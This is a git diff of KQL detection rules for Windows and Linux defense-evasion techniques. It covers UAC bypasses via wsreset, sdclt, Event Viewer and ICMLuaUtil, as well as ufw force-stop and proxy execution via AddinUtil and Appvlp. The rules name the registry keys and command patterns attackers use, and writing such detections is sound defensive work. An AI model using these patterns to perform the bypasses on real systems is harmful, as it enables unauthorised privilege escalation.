b/KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using PkgMgr and DISM -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-23 -// Level: high -// Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: UAC Bypass Using PkgMgr and DISM +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where FolderPath endswith "\\dism.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\pkgmgr.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql index 15db9392..de70bf24 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using Windows Media Player - File -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-23 -// Level: high -// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceFileEvents +// Title: UAC Bypass Using Windows Media Player - File +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents | where (FolderPath endswith "\\AppData\\Local\\Temp\\OskSupport.dll" and FolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\DllHost.exe" and FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql index 2e3560fd..9debdadf 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using Windows Media Player - Process -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-23 -// Level: high -// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: UAC Bypass Using Windows Media Player - Process +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where (FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe" or (FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" /s")) and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql index 87e58977..a46ce362 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using Windows Media Player - Registry -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-23 -// Level: high -// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceRegistryEvents +// Title: UAC Bypass Using Windows Media Player - Registry +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceRegistryEvents | where RegistryValueData =~ "Binary Data" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql b/KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql index d3e1ed50..89695cef 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass via Event Viewer -// Author: Florian Roth (Nextron Systems) -// Date: 2017-03-19 -// Level: high -// Description: Detects UAC bypass method using Windows event viewer -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 - -DeviceRegistryEvents +// Title: UAC Bypass via Event Viewer +// Author: Florian Roth (Nextron Systems) +// Date: 2017-03-19 +// Level: high +// Description: Detects UAC bypass method using Windows event viewer +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 + +DeviceRegistryEvents | where RegistryKey endswith "\\mscfile\\shell\\open\\command" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql b/KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql index 1e0a1a80..2a2b169a 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass via ICMLuaUtil -// Author: Florian Roth (Nextron Systems), Elastic (idea) -// Date: 2022-09-13 -// Level: high -// Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: UAC Bypass via ICMLuaUtil +// Author: Florian Roth (Nextron Systems), Elastic (idea) +// Date: 2022-09-13 +// Level: high +// Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where ((InitiatingProcessCommandLine contains "/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and InitiatingProcessFolderPath endswith "\\dllhost.exe") and (not((FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql b/KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql index 65b1bdbd..eea2b462 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass via Sdclt -// Author: Omer Yampel, Christian Burkard (Nextron Systems) -// Date: 2017-03-17 -// Level: high -// Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 - -DeviceRegistryEvents +// Title: UAC Bypass via Sdclt +// Author: Omer Yampel, Christian Burkard (Nextron Systems) +// Date: 2017-03-17 +// Level: high +// Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 + +DeviceRegistryEvents | where RegistryKey endswith "Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" or (RegistryValueData matches regex "-1[0-9]{3}\\\\Software\\\\Classes\\\\" and RegistryKey endswith "Software\\Classes\\Folder\\shell\\open\\command\\SymbolicLinkValue") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql b/KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql index dac64381..14419adc 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass via Windows Firewall Snap-In Hijack -// Author: Tim Rauch, Elastic (idea) -// Date: 2022-09-27 -// Level: medium -// Description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 - -DeviceProcessEvents +// Title: UAC Bypass via Windows Firewall Snap-In Hijack +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-27 +// Level: medium +// Description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 + +DeviceProcessEvents | where (InitiatingProcessCommandLine contains "WF.msc" and InitiatingProcessFolderPath endswith "\\mmc.exe") and (not(FolderPath endswith "\\WerFault.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql b/KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql index bb229670..0d445fd2 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Via Wsreset -// Author: oscd.community, Dmitry Uchakin -// Date: 2020-10-07 -// Level: high -// Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceRegistryEvents +// Title: UAC Bypass Via Wsreset +// Author: oscd.community, Dmitry Uchakin +// Date: 2020-10-07 +// Level: high +// Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceRegistryEvents | where RegistryKey endswith "\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_wsreset.kql b/KQL/rules/Defense Evasion/uac_bypass_wsreset.kql index c2371ce2..c7cb0138 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_wsreset.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_wsreset.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass WSReset -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-23 -// Level: high -// Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: UAC Bypass WSReset +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where FolderPath endswith "\\wsreset.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql b/KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql index 94f1016a..53d35b3e 100644 --- a/KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql +++ b/KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql @@ -1,12 +1,12 @@ -// Title: Ufw Force Stop Using Ufw-Init -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-01-18 -// Level: medium -// Description: Detects attempts to force stop the ufw using ufw-init -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004 -// False Positives: -// - Network administrators - -DeviceProcessEvents +// Title: Ufw Force Stop Using Ufw-Init +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-01-18 +// Level: medium +// Description: Detects attempts to force stop the ufw using ufw-init +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Network administrators + +DeviceProcessEvents | where (ProcessCommandLine contains "-ufw-init" and ProcessCommandLine contains "force-stop") or (ProcessCommandLine contains "ufw" and ProcessCommandLine contains "disable") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql b/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql index 7dc6f0b7..4a68b3dd 100644 --- a/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql +++ b/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql @@ -1,10 +1,10 @@ -// Title: Uncommon AddinUtil.EXE CommandLine Execution -// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) -// Date: 2023-09-18 -// Level: medium -// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Uncommon AddinUtil.EXE CommandLine Execution +// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) +// Date: 2023-09-18 +// Level: medium +// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where ((ProcessCommandLine contains "-AddInRoot:" or ProcessCommandLine contains "-PipelineRoot:") and (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe")) and (not((ProcessCommandLine contains "-AddInRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-AddInRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql b/KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql index 7b568e30..95871c9b 100644 --- a/KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql +++ b/KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql @@ -1,12 +1,12 @@ -// Title: Uncommon Assistive Technology Applications Execution Via AtBroker.EXE -// Author: Mateusz Wydra, oscd.community -// Date: 2020-10-12 -// Level: medium -// Description: Detects the start of a non built-in assistive technology applications via "Atbroker.EXE". -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate, non-default assistive technology applications execution - -DeviceProcessEvents +// Title: Uncommon Assistive Technology Applications Execution Via AtBroker.EXE +// Author: Mateusz Wydra, oscd.community +// Date: 2020-10-12 +// Level: medium +// Description: Detects the start of a non built-in assistive technology applications via "Atbroker.EXE". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate, non-default assistive technology applications execution + +DeviceProcessEvents | where (ProcessCommandLine contains "start" and (FolderPath endswith "\\AtBroker.exe" or ProcessVersionInfoOriginalFileName =~ "AtBroker.exe")) and (not((ProcessCommandLine contains "animations" or ProcessCommandLine contains "audiodescription" or ProcessCommandLine contains "caretbrowsing" or ProcessCommandLine contains "caretwidth" or ProcessCommandLine contains "colorfiltering" or ProcessCommandLine contains "cursorindicator" or ProcessCommandLine contains "cursorscheme" or ProcessCommandLine contains "filterkeys" or ProcessCommandLine contains "focusborderheight" or ProcessCommandLine contains "focusborderwidth" or ProcessCommandLine contains "highcontrast" or ProcessCommandLine contains "keyboardcues" or ProcessCommandLine contains "keyboardpref" or ProcessCommandLine contains "livecaptions" or ProcessCommandLine contains "magnifierpane" or ProcessCommandLine contains "messageduration" or ProcessCommandLine contains "minimumhitradius" or ProcessCommandLine contains "mousekeys" or ProcessCommandLine contains "Narrator" or ProcessCommandLine contains "osk" or ProcessCommandLine contains "overlappedcontent" or ProcessCommandLine contains "showsounds" or ProcessCommandLine contains "soundsentry" or ProcessCommandLine contains "speechreco" or ProcessCommandLine contains "stickykeys" or ProcessCommandLine contains "togglekeys" or ProcessCommandLine contains "voiceaccess" or ProcessCommandLine contains "windowarranging" or ProcessCommandLine contains "windowtracking" or ProcessCommandLine contains "windowtrackingtimeout" or ProcessCommandLine contains "windowtrackingzorder"))) and (not(ProcessCommandLine contains "Oracle_JavaAccessBridge")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql index 0fdfd14b..802c5177 100644 --- a/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql +++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql @@ -1,10 +1,10 @@ -// Title: Uncommon Child Process Of AddinUtil.EXE -// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) -// Date: 2023-09-18 -// Level: medium -// Description: Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Uncommon Child Process Of AddinUtil.EXE +// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) +// Date: 2023-09-18 +// Level: medium +// Description: Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\addinutil.exe" and (not((FolderPath endswith ":\\Windows\\System32\\conhost.exe" or FolderPath endswith ":\\Windows\\System32\\werfault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\werfault.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql index 1d237a37..6a4b8721 100644 --- a/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql +++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql @@ -1,13 +1,13 @@ -// Title: Uncommon Child Process Of Appvlp.EXE -// Author: Sreeman -// Date: 2020-03-13 -// Level: medium -// Description: Detects uncommon child processes of Appvlp.EXE -// Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. -// Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder -// or to mark a file as a system file. -// MITRE Tactic: Defense Evasion -// Tags: attack.t1218, attack.defense-evasion, attack.execution - -DeviceProcessEvents +// Title: Uncommon Child Process Of Appvlp.EXE +// Author: Sreeman +// Date: 2020-03-13 +// Level: medium +// Description: Detects uncommon child processes of Appvlp.EXE +// Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. +// Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder +// or to mark a file as a system file. +// MITRE Tactic: Defense Evasion +// Tags: attack.t1218, attack.defense-evasion, attack.execution + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\appvlp.exe" and (not((FolderPath endswith ":\\Windows\\SysWOW64\\rundll32.exe" or FolderPath endswith ":\\Windows\\System32\\rundll32.exe"))) and (not(((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\msoasb.exe") or (FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\MSOUC.EXE") or ((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath contains "\\SkypeSrv\\") and FolderPath endswith "\\SKYPESERVER.EXE")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql index b5a04ba0..7ea966da 100644 --- a/KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql +++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql @@ -1,10 +1,10 @@ -// Title: Uncommon Child Process Of Defaultpack.EXE -// Author: frack113 -// Date: 2022-12-31 -// Level: medium -// Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs -// MITRE Tactic: Defense Evasion -// Tags: attack.t1218, attack.defense-evasion, attack.execution - -DeviceProcessEvents +// Title: Uncommon Child Process Of Defaultpack.EXE +// Author: frack113 +// Date: 2022-12-31 +// Level: medium +// Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs +// MITRE Tactic: Defense Evasion +// Tags: attack.t1218, attack.defense-evasion, attack.execution + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\DefaultPack.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql index abbad71c..7a64a5d5 100644 --- a/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql +++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql @@ -1,14 +1,14 @@ -// Title: Uncommon Child Process Of Setres.EXE -// Author: @gott_cyber, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-11 -// Level: high -// Description: Detects uncommon child process of Setres.EXE. -// Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution. -// It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.t1202 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Uncommon Child Process Of Setres.EXE +// Author: @gott_cyber, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-11 +// Level: high +// Description: Detects uncommon child process of Setres.EXE. +// Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution. +// It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.t1202 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath contains "\\choice" and InitiatingProcessFolderPath endswith "\\setres.exe") and (not((FolderPath endswith "C:\\Windows\\System32\\choice.exe" or FolderPath endswith "C:\\Windows\\SysWOW64\\choice.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql index 2299a635..d3f06a71 100644 --- a/KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql +++ b/KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql @@ -1,13 +1,13 @@ -// Title: Uncommon Child Process Spawned By Odbcconf.EXE -// Author: Harjot Singh @cyb3rjy0t -// Date: 2023-05-22 -// Level: medium -// Description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.008 -// False Positives: -// - In rare occurrences where "odbcconf" crashes. It might spawn a "werfault" process -// - Other child processes will depend on the DLL being registered by actions like "regsvr". In case where the DLLs have external calls (which should be rare). Other child processes might spawn and additional filters need to be applied. - -DeviceProcessEvents +// Title: Uncommon Child Process Spawned By Odbcconf.EXE +// Author: Harjot Singh @cyb3rjy0t +// Date: 2023-05-22 +// Level: medium +// Description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - In rare occurrences where "odbcconf" crashes. It might spawn a "werfault" process +// - Other child processes will depend on the DLL being registered by actions like "regsvr". In case where the DLLs have external calls (which should be rare). Other child processes might spawn and additional filters need to be applied. + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\odbcconf.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql index 86cac343..689ef8d5 100644 --- a/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql +++ b/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql @@ -1,14 +1,14 @@ -// Title: Uncommon Extension In Keyboard Layout IME File Registry Value -// Author: X__Junior (Nextron Systems) -// Date: 2023-11-21 -// Level: high -// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. -// Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. -// IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. - -DeviceRegistryEvents +// Title: Uncommon Extension In Keyboard Layout IME File Registry Value +// Author: X__Junior (Nextron Systems) +// Date: 2023-11-21 +// Level: high +// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. +// Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. +// IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. + +DeviceRegistryEvents | where (RegistryKey endswith "\\Control\\Keyboard Layouts*" and RegistryKey contains "Ime File") and (not(RegistryValueData endswith ".ime")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql b/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql index 1a3263ab..85e794da 100644 --- a/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql +++ b/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql @@ -1,11 +1,11 @@ -// Title: Uncommon File Creation By Mysql Daemon Process -// Author: Joseph Kamau -// Date: 2024-05-27 -// Level: high -// Description: Detects the creation of files with scripting or executable extensions by Mysql daemon. -// Which could be an indicator of "User Defined Functions" abuse to download malware. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceFileEvents +// Title: Uncommon File Creation By Mysql Daemon Process +// Author: Joseph Kamau +// Date: 2024-05-27 +// Level: high +// Description: Detects the creation of files with scripting or executable extensions by Mysql daemon. +// Which could be an indicator of "User Defined Functions" abuse to download malware. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\mysqld.exe" or InitiatingProcessFolderPath endswith "\\mysqld-nt.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") \ No newline at end of file diff --git 